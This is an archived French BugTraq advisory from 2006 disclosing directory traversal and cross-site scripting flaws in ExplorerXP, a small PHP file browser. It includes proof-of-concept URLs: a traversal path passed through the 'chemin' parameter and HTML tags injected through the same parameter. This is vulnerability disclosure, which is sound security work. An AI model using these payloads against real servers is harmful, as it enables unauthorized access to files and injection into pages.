BugTraq in French
ExplorerXP : Directory Traversal Mar 28 2006 02:30AM
Silitix gmail com
ExplorerXP :
************

Informations :
**************
Langage : PHP

Problème : - Directory Traversal
- Cross Site Scripting ( XSS )
Description :
*************
ExploreXP consiste à visualiser l?arborescence des fichiers et répertoires à partir d?un répertoire donné. En tout 2

fichiers php (10KB) et un réperoire images. Un explorateur de fichiers très simple à mettre en oeuvre. Il possède en plus
un beau design "Windows XP".
L?installation est très facile, il suffit de télécharger le fichier compressé, de le décompressé et de déposer les 2

fichiers php + le répertoire d?images dans un répertoire quelconque. Faire pointer ensuite son navigateur sur

/repertoire/dir.php et le tour est joué.

Exploitation :
**************

Directory Traversal : http://[target]/dir.php?chemin=../../../

Cross Site Scripting : http://[target]/dir.php?chemin=../<b>Silitix
http://[target]/dir.php?chemin=../<br>Silitix

Screenshoots : http://www.Silitix.com/explorerxp.php

Crédits
*******
Auteur : Amine ABOUD aka Silitix
E-mail : admin (at) silitix (dot) com [email concealed]
Website : http://www.Silitix.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus